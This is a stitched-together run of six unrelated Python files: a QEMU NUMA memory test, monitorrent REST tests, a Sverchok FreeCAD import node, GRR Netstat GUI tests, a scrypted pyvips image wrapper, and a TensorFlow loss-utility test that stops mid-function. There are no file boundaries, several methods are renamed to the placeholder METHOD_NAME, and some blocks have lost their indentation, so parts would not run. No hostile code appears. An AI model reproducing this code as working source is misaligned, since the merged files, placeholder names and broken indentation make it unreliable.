       thread is not switch to other node.
    6) Repeat step 3~5 for each vcpu thread of the guest.

    :param test: QEMU test object
    :param params: Dictionary with the test parameters
    :param env: Dictionary with test environment.
    """

    def METHOD_NAME(numa_node_info, vcpu_thread):
        # NUMA node of the host CPU that this vcpu thread currently runs on.
        cpu_used_host = cpu.get_thread_cpu(vcpu_thread)[0]
        node_used_host = ([_ for _ in node_list if cpu_used_host
                           in numa_node_info.nodes[_].cpus][0])
        return node_used_host

    error_context.context("Get host numa topological structure", test.log.info)
    timeout = float(params.get("login_timeout", 240))
    host_numa_node = utils_misc.NumaInfo()
    node_list = host_numa_node.online_nodes_withcpumem
    if len(node_list) < 2:
        test.cancel("This host only has one NUMA node, skipping test...")
    node_list.sort()
    # Guest topology: one single-core/single-thread vcpu socket per host NUMA
    # node, one memory backend per guest node.
    params['smp'] = len(node_list)
    params['vcpu_cores'] = 1
    params['vcpu_threads'] = 1
    params['vcpu_sockets'] = params['smp']
    params['vcpu_maxcpus'] = params['smp']
    params['guest_numa_nodes'] = ""
    params['mem_devs'] = ""
    params['backend_mem'] = "memory-backend-ram"
    params['use_mem'] = "no"
    params['size_mem'] = "1024M"
    if arch.ARCH in ('ppc64', 'ppc64le'):
        params['size_mem'] = "4096M"
    params['mem'] = int(params['size_mem'].strip('M')) * len(node_list)
    for node_id in range(len(node_list)):
        params['guest_numa_nodes'] += " node%d" % node_id
        params['mem_devs'] += "mem%d " % node_id
        params['numa_memdev_node%d' % node_id] = "mem-mem%d" % node_id
    params['start_vm'] = 'yes'
    utils_memory.drop_caches()
    vm = params['main_vm']
    env_process.preprocess_vm(test, params, env, vm)
    vm = env.get_vm(vm)
    vm.verify_alive()
    vcpu_threads = vm.vcpu_threads
    session = vm.wait_for_login(timeout=timeout)

    threshold = params.get_numeric("threshold", target_type=float)
    # Per-vcpu dd size; shrink so the total stays within half of guest memory.
    dd_size = 256
    if dd_size * len(vcpu_threads) > int(params['mem']):
        dd_size = int(int(params['mem']) / 2 / len(vcpu_threads))

    mount_size = dd_size * len(vcpu_threads)
    mount_cmd = "mount -o size=%dM -t tmpfs none /tmp" % mount_size
    qemu_pid = vm.get_pid()
    drop = 0
    for cpuid in range(len(vcpu_threads)):
        error_context.context("Get vcpu %s used numa node." % cpuid,
                              test.log.info)
        memory_status, _ = utils_test.qemu.get_numa_status(host_numa_node,
                                                           qemu_pid)
        node_used_host = METHOD_NAME(host_numa_node,
                                     vcpu_threads[cpuid])
        node_used_host_index = node_list.index(node_used_host)
        memory_used_before = memory_status[node_used_host_index]
        error_context.context("Allocate memory in guest", test.log.info)
        session.cmd(mount_cmd)
        # Pin the dd process to this vcpu so the allocation should land on the
        # same host NUMA node as the vcpu thread.
        binded_dd_cmd = "taskset %s" % str(2 ** int(cpuid))
        binded_dd_cmd += " dd if=/dev/urandom of=/tmp/%s" % cpuid
        binded_dd_cmd += " bs=1M count=%s" % dd_size
        session.cmd(binded_dd_cmd)
        error_context.context("Check qemu process memory use status",
                              test.log.info)
        node_after = METHOD_NAME(host_numa_node, vcpu_threads[cpuid])
        if node_after != node_used_host:
            # Fix: `log.warn` is a deprecated alias of `log.warning`.
            test.log.warning("Node used by vcpu thread changed. So drop the"
                             " results in this round.")
            drop += 1
            continue
        memory_status, _ = utils_test.qemu.get_numa_status(host_numa_node,
                                                           qemu_pid)
        memory_used_after = memory_status[node_used_host_index]
        page_size = resource.getpagesize() / 1024
        memory_allocated = (memory_used_after -
                            memory_used_before) * page_size / 1024
        if 1 - float(memory_allocated) / float(dd_size) > threshold:
            numa_hardware_cmd = params.get("numa_hardware_cmd")
            # Fix: initialize numa_info so the failure message below cannot
            # raise NameError when numa_hardware_cmd is not configured.
            numa_info = "N/A"
            if numa_hardware_cmd:
                numa_info = process.system_output(numa_hardware_cmd,
                                                  ignore_status=True,
                                                  shell=True)
            msg = "Expect malloc %sM memory in node %s," % (dd_size,
                                                            node_used_host)
            msg += "but only malloc %sM \n" % memory_allocated
            msg += "Please check more details of the numa node: %s" % numa_info
            test.fail(msg)
    session.close()

    if drop == len(vcpu_threads):
        test.error("All test rounds are dropped. Please test it again.")
from builtins import range
import json
import falcon
from mock import MagicMock
from ddt import ddt, data
from tests import RestTestBase
from monitorrent.rest.execute_logs import ExecuteLogs
class ExecuteLogsTest(RestTestBase):
def test_get_all(self):
    """A page large enough for everything returns all entries plus the total."""
    all_entries = [{}, {}, {}]
    total = 3
    log_manager = MagicMock()
    log_manager.METHOD_NAME = MagicMock(return_value=(all_entries, total))
    # noinspection PyTypeChecker
    self.api.add_route('/api/execute/logs', ExecuteLogs(log_manager))

    raw_body = self.simulate_request('/api/execute/logs', query_string='take=10', decode='utf-8')

    self.assertEqual(self.srmock.status, falcon.HTTP_OK)
    self.assertTrue('application/json' in self.srmock.headers_dict['Content-Type'])

    payload = json.loads(raw_body)
    self.assertEqual(all_entries, payload['data'])
    self.assertEqual(total, payload['count'])
def test_get_paged(self):
    """take/skip slice the entries while count always reports the total."""
    # count should be less than 30
    count = 23
    entries = [{'i': i} for i in range(count)]

    def METHOD_NAME(skip, take):
        # Emulate the log manager's paged query over the fake entries.
        return entries[skip:skip + take], count

    log_manager = MagicMock()
    log_manager.METHOD_NAME = MagicMock(side_effect=METHOD_NAME)
    # noinspection PyTypeChecker
    execute_logs = ExecuteLogs(log_manager)
    self.api.add_route('/api/execute/logs', execute_logs)

    # Page 1 without an explicit skip defaults to skip=0.
    body = self.simulate_request('/api/execute/logs', query_string='take=10', decode='utf-8')
    self.assertEqual(self.srmock.status, falcon.HTTP_OK)
    self.assertTrue('application/json' in self.srmock.headers_dict['Content-Type'])
    result = json.loads(body)
    self.assertEqual(entries[0:10], result['data'])
    self.assertEqual(count, result['count'])

    body = self.simulate_request('/api/execute/logs', query_string='take=10&skip=0', decode='utf-8')
    self.assertEqual(self.srmock.status, falcon.HTTP_OK)
    self.assertTrue('application/json' in self.srmock.headers_dict['Content-Type'])
    result = json.loads(body)
    self.assertEqual(entries[0:10], result['data'])
    self.assertEqual(count, result['count'])

    body = self.simulate_request('/api/execute/logs', query_string='take=10&skip=10', decode='utf-8')
    self.assertEqual(self.srmock.status, falcon.HTTP_OK)
    self.assertTrue('application/json' in self.srmock.headers_dict['Content-Type'])
    result = json.loads(body)
    self.assertEqual(entries[10:20], result['data'])
    self.assertEqual(count, result['count'])

    # Last, partial page.
    body = self.simulate_request('/api/execute/logs', query_string='take=10&skip=20', decode='utf-8')
    self.assertEqual(self.srmock.status, falcon.HTTP_OK)
    self.assertTrue('application/json' in self.srmock.headers_dict['Content-Type'])
    result = json.loads(body)
    # assume that count is less then 30
    self.assertEqual(entries[20:count], result['data'])
    self.assertEqual(count, result['count'])
def test_bad_requests(self):
entries = [{}, {}, {}]
count = 3
log_manager = MagicMock()
log_manager.METHOD_NAME = MagicMock(return_value=(entries, count))
# noinspection PyTypeChecker
execute_logs = ExecuteLogs(log_manager)
self.api.add_route('/api/execute/logs', execute_logs)
self.simulate_request('/api/execute/logs')
self.assertEqual(self.srmock.status, falcon.HTTP_BAD_REQUEST, 'take is required')
self.simulate_request('/api/execute/logs', query_string='take=abcd')
self.assertEqual(self.srmock.status, falcon.HTTP_BAD_REQUEST, 'take should be int')
self.simulate_request('/api/execute/logs', query_string='take=10&skip=abcd')
self.assertEqual(self.srmock.status, falcon.HTTP_BAD_REQUEST, 'skip should be int')
self.simulate_request('/api/execute/logs', query_string='take=101')
self.assertEqual(self.srmock.status, falcon.HTTP_BAD_REQUEST, 'take should be less or equal to 100')
self.simulate_request('/api/execute/logs', query_string='take=-10')
self.assertEqual(self.srmock.status, falcon.HTTP_BAD_REQUEST, 'take should be greater than 0')
self.simulate_request('/api/execute/logs', query_string='take=0')
self.assertEqual(self.srmock.status, falcon.HTTP_BAD_REQUEST, 'take should be greater than 0')
self.simulate_request('/api/execute/logs', query_string='take=10&skip=-1')
self.assertEqual(self.srmock.status, falcon.HTTP_BAD_REQUEST, 'skip should be greater or equal to 0') |
import bpy
from bpy.props import StringProperty, BoolProperty, EnumProperty
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.data_structure import updateNode
from sverchok.utils.sv_logging import sv_logger
from sverchok.dependencies import FreeCAD
from sverchok.utils.sv_operator_mixins import SvGenericNodeLocator
if FreeCAD is not None:
F = FreeCAD
class SvReadFCStdOperator(bpy.types.Operator, SvGenericNodeLocator):
    """Operator that forces the target node to re-read its FreeCAD file."""
    bl_idname = "node.sv_read_fcstd_operator"
    bl_label = "read freecad file"
    bl_options = {'INTERNAL', 'REGISTER'}

    def execute(self, context):
        target = self.get_node(context)
        # Nothing to do unless the node exists, someone listens to its
        # outputs, and a file path is connected.
        if (
            not target
            or not any(sock.is_linked for sock in target.outputs)
            or not target.inputs['File Path'].is_linked
        ):
            return {'CANCELLED'}
        target.read_FCStd(target)
        updateNode(target, context)
        return {'FINISHED'}
class SvReadFCStdNode(SverchCustomTreeNode, bpy.types.Node):
    """
    Triggers: Read FreeCAD file
    Tooltip: import parts from a .FCStd file
    """
    bl_idname = 'SvReadFCStdNode'
    bl_label = 'Read FCStd'
    bl_icon = 'IMPORT'
    sv_category = "Solid Outputs"
    sv_dependencies = {'FreeCAD'}

    # When disabled, process() skips re-reading the file on tree updates.
    read_update : BoolProperty(name="read_update", default=True)
    # Object-type filters: which FreeCAD object kinds to import.
    read_body : BoolProperty(name="read_body", default=True, update = updateNode)
    read_part : BoolProperty(name="read_part", default=True, update = updateNode)
    # Include boolean-operation tool objects (and optionally PartDesign features).
    tool_parts : BoolProperty(name="tool_parts", default=False, update = updateNode)
    read_features : BoolProperty(name="read_features", default=False, update = updateNode)
    # Invert the label filter: import everything NOT matching the filter.
    inv_filter : BoolProperty(name="inv_filter", default=False, update = updateNode)
    # Label/part currently chosen via the SvShowFcstdNamesOp popup.
    selected_label : StringProperty( default= 'Select FC Part')
    selected_part : StringProperty( default='', update = updateNode)

    def draw_buttons(self, context, layout):
        # UI: part picker (only when a file is linked) plus the filter toggles
        # and a manual refresh button.
        col = layout.column(align=True)
        if self.inputs['File Path'].is_linked:
            self.wrapper_tracked_ui_draw_op(
                col, SvShowFcstdNamesOp.bl_idname,
                icon= 'TRIA_DOWN',
                text= self.selected_label )
        col.prop(self, 'read_update', text = 'global update')
        col.prop(self, 'read_body')
        col.prop(self, 'read_part')
        col.prop(self, 'tool_parts')
        if self.tool_parts:
            col.prop(self, 'read_features')
        col.prop(self, 'inv_filter')
        self.wrapper_tracked_ui_draw_op(layout, SvReadFCStdOperator.bl_idname, icon='FILE_REFRESH', text="UPDATE")

    def sv_init(self, context):
        self.inputs.new('SvFilePathSocket', "File Path")
        self.inputs.new('SvStringsSocket', "Part Filter")
        self.outputs.new('SvSolidSocket', "Solid")
        self.outputs.new('SvTextSocket', "Names")

    def ensure_name_socket_exists(self):
        # Backward compatibility: nodes saved before the "Names" output
        # existed need it created on demand.
        if not "Names" in self.outputs:
            self.outputs.new('SvTextSocket', "Names")

    def read_FCStd(self, node):
        """Load solids (and their names) from every linked .FCStd file into
        the node's outputs, honouring the label and object-type filters."""
        files = node.inputs['File Path'].sv_get()[0]
        part_filter = []
        if node.inputs['Part Filter'].is_linked:
            part_filter = node.inputs['Part Filter'].sv_get()[0]
        # The popup-selected part always participates in the filter.
        if node.selected_part != '' and not node.selected_part in part_filter:
            part_filter.append(node.selected_part)
        solids = []
        obj_mask = []
        names = []
        if node.read_features:
            obj_mask.append('PartDesign')
        if node.read_part:
            obj_mask.append('Part')
        if node.read_body:
            obj_mask.append('PartDesign::Body')
        for f in files:
            # LoadSolid yields (Shape, (FullName, Name, Label)) pairs.
            S = LoadSolid(f, part_filter, obj_mask, node.tool_parts, node.inv_filter)
            for s, n in S:
                solids.append(s)
                names.append(list(n))
        node.outputs['Solid'].sv_set(solids)
        self.ensure_name_socket_exists()
        node.outputs['Names'].sv_set(names)

    def process(self):
        # Only do work when something downstream listens and a file is linked.
        if not any(socket.is_linked for socket in self.outputs):
            return
        if not self.inputs['File Path'].is_linked:
            return
        if self.read_update:
            self.read_FCStd(self)
        else:
            return
class SvShowFcstdNamesOp(bpy.types.Operator, SvGenericNodeLocator):
    """Search-popup operator listing the labels of matching objects in the
    FreeCAD files linked to a SvReadFCStdNode, so the user can pick one."""
    bl_idname = "node.sv_show_fcstd_names"
    bl_label = "Show parts list"
    bl_options = {'INTERNAL', 'REGISTER'}
    bl_property = "option"

    def LabelReader(self, context):
        """Build EnumProperty items from the node's linked FreeCAD files.

        Only objects whose Module/TypeId match the node's read_* filters are
        listed.  A failure on one file is logged and does not abort the scan
        of the remaining files.
        """
        labels = [('', '', '')]
        tree = bpy.data.node_groups[self.tree_name]
        node = tree.nodes[self.node_name]
        fc_file_list = node.inputs['File Path'].sv_get()[0]

        # Mirror the node's object-type filter.
        obj_mask = []
        if node.read_features:
            obj_mask.append('PartDesign')
        if node.read_part:
            obj_mask.append('Part')
        if node.read_body:
            obj_mask.append('PartDesign::Body')

        for f in fc_file_list:
            doc = None  # guard: F.open() may raise before `doc` is bound
            try:
                doc = F.open(f)
                for obj in doc.Objects:
                    if obj.Module in obj_mask or obj.TypeId in obj_mask:
                        labels.append((obj.Label, obj.Label, obj.Label))
            except Exception as err:
                # Bug fix: the previous message formatted a name that was
                # unbound whenever F.open() itself failed (NameError inside
                # the handler); log the offending file path instead.
                sv_logger.info(f'FCStd label read error: {f}')
                sv_logger.info(err)
            finally:
                # Bug fix: only close documents that were actually opened;
                # `doc` used to be referenced here even when F.open() failed.
                if doc is not None:
                    F.closeDocument(doc.Name)
        return labels

    option : EnumProperty(items=LabelReader)
    tree_name : StringProperty()
    node_name : StringProperty()

    def execute(self, context):
        tree = bpy.data.node_groups[self.tree_name]
        node = tree.nodes[self.node_name]
        # NOTE(review): `name_filter` is not a declared property on
        # SvReadFCStdNode -- confirm it is intentionally dynamic.
        node.name_filter = self.option
        node.selected_label = self.option
        node.selected_part = self.option
        bpy.context.area.tag_redraw()
        return {'FINISHED'}

    def METHOD_NAME(self, context, event):
        # Open the searchable enum popup at the mouse position.
        context.space_data.cursor_location_from_region(event.mouse_region_x, event.mouse_region_y)
        wm = context.window_manager
        wm.invoke_search_popup(self)
        return {'FINISHED'}
def LoadSolid(fc_file, part_filter, obj_mask, tool_parts, inv_filter):
    """Open *fc_file* and collect (Shape, (FullName, Name, Label)) pairs.

    Objects are kept when their Module or TypeId is in *obj_mask*.  Unless
    *tool_parts* is set, operands of boolean operations are excluded.  The
    label filter keeps labels in *part_filter* (or everything if the filter
    is empty); *inv_filter* inverts that test.  Returns a set of pairs; on
    error the partial result gathered so far is returned.
    """
    objs = set()
    outList = set()
    solids = set()
    doc = None  # guard: F.open() may raise before `doc` is bound
    try:
        doc = F.open(fc_file)
        for obj in doc.Objects:
            if obj.Module in obj_mask or obj.TypeId in obj_mask:
                objs.add(obj)
                # Exclude boolean-operation operands unless requested.
                if not tool_parts and obj.TypeId in (
                        'Part::Cut', 'Part::Fuse', 'Part::MultiCommon',
                        'Part::Section', 'Part::FeaturePython'):
                    outList.update(obj.OutList)
        objs = objs - outList
        for obj in objs:
            if not inv_filter:
                keep = obj.Label in part_filter or len(part_filter) == 0
            else:
                keep = obj.Label not in part_filter
            if keep:
                solids.add((obj.Shape, (obj.FullName, obj.Name, obj.Label)))
    except Exception:
        # Bug fix: was a bare `except:` (also swallowed KeyboardInterrupt).
        sv_logger.info('FCStd read error')
    finally:
        # Bug fix: only close a document that was actually opened; `doc`
        # used to be referenced here even when F.open() failed (NameError).
        if doc is not None:
            F.closeDocument(doc.Name)
    return solids
def register():
    """Register this module's node and operator classes with Blender."""
    for cls in (SvReadFCStdNode, SvShowFcstdNamesOp, SvReadFCStdOperator):
        bpy.utils.register_class(cls)
def unregister():
    """Remove this module's node and operator classes from Blender."""
    for cls in (SvReadFCStdNode, SvShowFcstdNamesOp, SvReadFCStdOperator):
        bpy.utils.unregister_class(cls)
#!/usr/bin/env python
from absl import app
from grr_response_core.lib.rdfvalues import client_network as rdf_client_network
from grr_response_server.flows.general import network
from grr_response_server.gui import gui_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import test_lib
class NetstatTest(gui_test_lib.GRRSeleniumTest):
  """Tests the Netstat Flow."""

  def setUp(self):
    # All tests need a client with an approved access grant.
    super().setUp()
    self.client_id = self.SetupClient(0)
    self.RequestAndGrantClientApproval(self.client_id)

  def testFiltering(self):
    """Typing into the filter input narrows the result rows."""
    flow_id = flow_test_lib.StartFlow(
        network.Netstat, creator=self.test_username, client_id=self.client_id)
    self.Open(f"/v2/clients/{self.client_id}")
    self.WaitUntil(self.IsElementPresent,
                   "css=result-accordion .title:contains('All connections')")
    flow_test_lib.AddResultsToFlow(self.client_id, flow_id, [
        rdf_client_network.NetworkConnection(process_name=f"process{i}")
        for i in range(10)
    ])
    self.Click("css=result-accordion .title:contains('All connections')")
    for i in range(10):
      self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
    self.Type("css=.filter-input input", "process0")
    self.WaitUntil(self.IsElementPresent, "css=td:contains('process0')")
    # Only the single matching row remains visible.
    self.assertEqual(self.GetCssCount("css=td:contains('process')"), 1)

  def testSorting(self):
    """Clicking the column header sorts ascending, then descending."""
    flow_args = network.NetstatArgs(listening_only=True)
    flow_id = flow_test_lib.StartFlow(
        network.Netstat,
        creator=self.test_username,
        client_id=self.client_id,
        flow_args=flow_args)
    self.Open(f"/v2/clients/{self.client_id}")
    self.WaitUntil(self.IsElementPresent,
                   "css=result-accordion .title:contains('Listening only')")
    flow_test_lib.AddResultsToFlow(self.client_id, flow_id, [
        rdf_client_network.NetworkConnection(process_name=f"process{i}")
        for i in range(3)
    ])
    self.Click("css=result-accordion .title:contains('Listening only')")
    for i in range(3):
      self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
    self.Click("css=.mat-sort-header:contains('Process Name')")
    for i in [0, 1, 2]:  # reordered results asc
      self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
    self.Click("css=.mat-sort-header:contains('Process Name')")
    for i in [2, 1, 0]:  # reordered results desc
      self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")

  def METHOD_NAME(self):
    """Navigating pages works from both the top and bottom paginators."""
    flow_args = network.NetstatArgs(listening_only=True)
    flow_id = flow_test_lib.StartFlow(
        network.Netstat,
        creator=self.test_username,
        client_id=self.client_id,
        flow_args=flow_args)
    self.Open(f"/v2/clients/{self.client_id}")
    self.WaitUntil(self.IsElementPresent,
                   "css=result-accordion .title:contains('Listening only')")
    # 15 results with a default page size of 10 -> two pages.
    flow_test_lib.AddResultsToFlow(self.client_id, flow_id, [
        rdf_client_network.NetworkConnection(process_name=f"process{i}")
        for i in range(15)
    ])
    self.Click("css=result-accordion .title:contains('Listening only')")
    for i in range(10):
      self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
    self.assertEqual(self.GetCssCount("css=td:contains('process')"), 10)
    # Navigation works in both top and bottom paginators.
    self.Click("css=.top-paginator .mat-mdc-paginator-navigation-last")
    for i in range(10, 15):
      self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
    self.assertEqual(self.GetCssCount("css=td:contains('process')"), 5)
    self.ScrollToBottom()
    self.Click("css=.bottom-paginator .mat-mdc-paginator-navigation-previous")
    for i in range(10):
      self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
    self.assertEqual(self.GetCssCount("css=td:contains('process')"), 10)

  def testPaginationSize(self):
    """Changing page size in one paginator syncs the other and the rows."""
    flow_args = network.NetstatArgs(listening_only=False)
    flow_id = flow_test_lib.StartFlow(
        network.Netstat,
        creator=self.test_username,
        client_id=self.client_id,
        flow_args=flow_args)
    self.Open(f"/v2/clients/{self.client_id}")
    self.WaitUntil(self.IsElementPresent,
                   "css=result-accordion .title:contains('All connections')")
    flow_test_lib.AddResultsToFlow(self.client_id, flow_id, [
        rdf_client_network.NetworkConnection(process_name=f"process{i}")
        for i in range(15)
    ])
    self.Click("css=result-accordion .title:contains('All connections')")
    for i in range(10):
      self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
    self.assertEqual(self.GetCssCount("css=td:contains('process')"), 10)
    # Select one paginator updates the other paginator as well as the displayed
    # rows.
    self.MatSelect("css=.bottom-paginator mat-select", "50")
    self.WaitUntilContains("50", self.GetText, "css=.top-paginator mat-select")
    self.WaitUntilContains("50", self.GetText,
                           "css=.bottom-paginator mat-select")
    for i in range(15):
      self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
    self.assertEqual(self.GetCssCount("css=td:contains('process')"), 15)
    self.MatSelect("css=.top-paginator mat-select", "10")
    self.WaitUntilContains("10", self.GetText, "css=.top-paginator mat-select")
    self.WaitUntilContains("10", self.GetText,
                           "css=.bottom-paginator mat-select")
    for i in range(10):
      self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
    self.assertEqual(self.GetCssCount("css=td:contains('process')"), 10)
if __name__ == "__main__":
app.run(test_lib.main) |
import scrypted_sdk
from generator_common import createImageMediaObject
from typing import Any
try:
import pyvips
from pyvips import Image
except:
Image = None
pyvips = None
from thread import to_thread
class VipsImage(scrypted_sdk.Image):
    """scrypted Image implementation backed by a pyvips image."""

    def __init__(self, vipsImage: Image) -> None:
        super().__init__()
        self.vipsImage = vipsImage
        self.width = vipsImage.width
        self.height = vipsImage.height

    async def close(self):
        # Drop our reference and invalidate vips' cache for this image.
        vips = self.vipsImage
        self.vipsImage = None
        if vips:
            vips.invalidate()

    async def toBuffer(self, options: scrypted_sdk.ImageOptions = None) -> bytearray:
        """Return pixel data after applying crop/resize from *options*.

        With no 'format' the raw memory layout is returned; 'rgba', 'rgb'
        and 'gray' select raw band layouts; any other value is passed to
        pyvips as an encoder suffix (e.g. 'jpg') for compressed output.
        """
        vipsImage: VipsImage = await self.toImageInternal(options)
        if not options or not options.get('format', None):
            def format():
                return memoryview(vipsImage.vipsImage.write_to_memory())
            return await to_thread(format)
        elif options['format'] == 'rgba':
            def format():
                # Bug fix: this condition was inverted (`not bands == 3`),
                # which returned 3-band data for RGB sources and appended a
                # 5th band to images that already had alpha.
                if vipsImage.vipsImage.bands == 3:
                    rgba = vipsImage.vipsImage.addalpha()
                else:
                    rgba = vipsImage.vipsImage
                return memoryview(rgba.write_to_memory())
            return await to_thread(format)
        elif options['format'] == 'rgb':
            def format():
                # Strip the alpha channel when present.
                if vipsImage.vipsImage.bands == 4:
                    rgb = vipsImage.vipsImage.extract_band(0, n=vipsImage.vipsImage.bands - 1)
                else:
                    rgb = vipsImage.vipsImage
                return memoryview(rgb.write_to_memory())
            return await to_thread(format)
        elif options['format'] == 'gray':
            if vipsImage.vipsImage.bands == 1:
                def format():
                    return memoryview(vipsImage.vipsImage.write_to_memory())
            else:
                def format():
                    # Drop alpha first, then convert to single-band b-w.
                    if vipsImage.vipsImage.bands == 4:
                        gray = vipsImage.vipsImage.extract_band(0, n=vipsImage.vipsImage.bands - 1)
                    else:
                        gray = vipsImage.vipsImage
                    gray = gray.colourspace("b-w")
                    return memoryview(gray.write_to_memory())
            return await to_thread(format)
        return await to_thread(lambda: vipsImage.vipsImage.write_to_buffer(f'.{options["format"]}[Q=80]'))

    async def toImageInternal(self, options: scrypted_sdk.ImageOptions = None):
        # Apply crop/resize off the event loop.
        return await to_thread(lambda: toVipsImage(self, options))

    async def METHOD_NAME(self, options: scrypted_sdk.ImageOptions = None) -> Any:
        """Return a new Image media object with crop/resize applied."""
        if options and options.get('format', None):
            raise Exception('format can only be used with toBuffer')
        newVipsImage = await self.toImageInternal(options)
        return await createImageMediaObject(newVipsImage)
def toVipsImage(vipsImageWrapper: VipsImage, options: scrypted_sdk.ImageOptions = None) -> VipsImage:
    """Apply the crop and resize requested in *options* to the wrapped
    pyvips image and return a new VipsImage wrapper.

    Raises if the wrapper has already been invalidated via close().
    """
    vipsImage = vipsImageWrapper.vipsImage
    if not vipsImage:
        raise Exception('Video Frame has been invalidated')

    options = options or {}

    crop = options.get('crop')
    if crop:
        vipsImage = vipsImage.crop(
            int(crop['left']), int(crop['top']),
            int(crop['width']), int(crop['height']))

    resize = options.get('resize')
    if resize:
        # Per-axis scale factors; a missing axis inherits the other's so
        # aspect ratio is preserved when only one dimension is given.
        # (Removed a dead `scale` local that was computed but never used.)
        xscale = None
        if resize.get('width'):
            xscale = resize['width'] / vipsImage.width
        yscale = None
        if resize.get('height'):
            yscale = resize['height'] / vipsImage.height
        xscale = xscale or yscale
        yscale = yscale or xscale
        vipsImage = vipsImage.resize(xscale, vscale=yscale, kernel='linear')

    return VipsImage(vipsImage)
class ImageReader(scrypted_sdk.ScryptedDeviceBase, scrypted_sdk.BufferConverter):
    """Converts encoded image buffers (image/*) into scrypted Image objects."""

    def __init__(self, nativeId: str):
        super().__init__(nativeId)
        self.fromMimeType = 'image/*'
        self.toMimeType = scrypted_sdk.ScryptedMimeTypes.Image.value

    async def convert(self, data: Any, fromMimeType: str, toMimeType: str, options: scrypted_sdk.MediaObjectOptions = None) -> Any:
        # Let pyvips sniff the container format from the buffer contents.
        decoded = Image.new_from_buffer(data, '')
        wrapper = VipsImage(decoded)
        return await createImageMediaObject(wrapper)
class ImageWriter(scrypted_sdk.ScryptedDeviceBase, scrypted_sdk.BufferConverter):
    """Converts scrypted Image/VideoFrame objects into encoded JPEG buffers."""

    def __init__(self, nativeId: str):
        super().__init__(nativeId)
        self.fromMimeType = scrypted_sdk.ScryptedMimeTypes.Image.value
        self.toMimeType = 'image/*'

    async def convert(self, data: scrypted_sdk.VideoFrame, fromMimeType: str, toMimeType: str, options: scrypted_sdk.MediaObjectOptions = None) -> Any:
        # Bug fix: the options key was the *builtin* `format` function
        # ({format: 'jpg'}), so toBuffer's options.get('format') returned
        # None and raw pixel memory was emitted instead of a JPEG.
        return await data.toBuffer({
            'format': 'jpg',
        })
def new_from_memory(data, width: int, height: int, bands: int):
    """Wrap raw interleaved uint8 pixel *data* in a pyvips Image."""
    return Image.new_from_memory(data, width, height, bands, pyvips.BandFormat.UCHAR)
def new_from_buffer(data, width: int, height: int, bands: int):
    # NOTE(review): pyvips' Image.new_from_buffer signature is
    # (data, options_string, **kwargs); passing width/height/bands/format
    # positionally looks like a copy-paste of new_from_memory and would
    # raise at runtime -- confirm intent against callers before fixing.
    return Image.new_from_buffer(data, width, height, bands, pyvips.BandFormat.UCHAR)
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for loss scaling utilities in tensorflow.ops.nn."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import strategy_combinations
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import nn_impl
from tensorflow.python.platform import test as test_lib
class LossUtilitiesTest(test_lib.TestCase, parameterized.TestCase):
  """Tests compute_average_loss / scale_regularization_loss, with and
  without a MirroredStrategy distributing over two virtual CPU devices."""

  def setUp(self):
    # Distributed cases need at least 3 virtual CPUs (host + 2 replicas).
    strategy_combinations.set_virtual_cpus_to_at_least(3)
    super(LossUtilitiesTest, self).setUp()

  def testComputeAverageLossGlobalBatchSize(self):
    # An explicit global_batch_size divides the summed loss: 15 / 10 = 1.5.
    per_example_loss = [1, 2, 3, 4, 5]
    loss = nn_impl.compute_average_loss(per_example_loss, global_batch_size=10)
    self.assertEqual(self.evaluate(loss), 1.5)

  @combinations.generate(
      combinations.combine(
          distribution=[
              strategy_combinations.mirrored_strategy_with_cpu_1_and_2
          ],
          mode=["graph", "eager"]))
  def METHOD_NAME(self, distribution):
    # Without strategy - num replicas = 1
    per_example_loss = constant_op.constant([2.5, 6.2, 5.])
    loss = nn_impl.compute_average_loss(per_example_loss)
    self.assertAllClose(self.evaluate(loss), (2.5 + 6.2 + 5.) / 3)
    # With strategy - num replicas = 2
    with distribution.scope():
      per_replica_losses = distribution.experimental_run_v2(
          nn_impl.compute_average_loss, args=(per_example_loss,))
      loss = distribution.reduce("SUM", per_replica_losses, axis=None)
      self.assertAllClose(self.evaluate(loss), (2.5 + 6.2 + 5.) / 3)

  @combinations.generate(
      combinations.combine(
          distribution=[
              strategy_combinations.mirrored_strategy_with_cpu_1_and_2
          ],
          mode=["graph", "eager"]))
  def testComputeAverageLossSampleWeights(self, distribution):
    with distribution.scope():
      # Scalar sample weight
      per_replica_losses = distribution.experimental_run_v2(
          nn_impl.compute_average_loss,
          args=([2., 4., 6.],),
          kwargs={"sample_weight": 2})
      loss = distribution.reduce("SUM", per_replica_losses, axis=None)
      self.assertAllClose(self.evaluate(loss), (2. + 4. + 6.) * 2. / 3)
      # Per example sample weight
      per_replica_losses = distribution.experimental_run_v2(
          nn_impl.compute_average_loss,
          args=([2., 4., 6.],),
          kwargs={"sample_weight": [0.3, 0.5, 0.2]})
      loss = distribution.reduce("SUM", per_replica_losses, axis=None)
      self.assertAllClose(
          self.evaluate(loss), (2. * 0.3 + 4. * 0.5 + 6. * 0.2) / 3)
      # Time-step sample weight
      per_replica_losses = distribution.experimental_run_v2(
          nn_impl.compute_average_loss,
          args=([[2., 0.5], [4., 1.]],),
          kwargs={"sample_weight": [[0.3, 0.7], [0.2, 0.8]]})
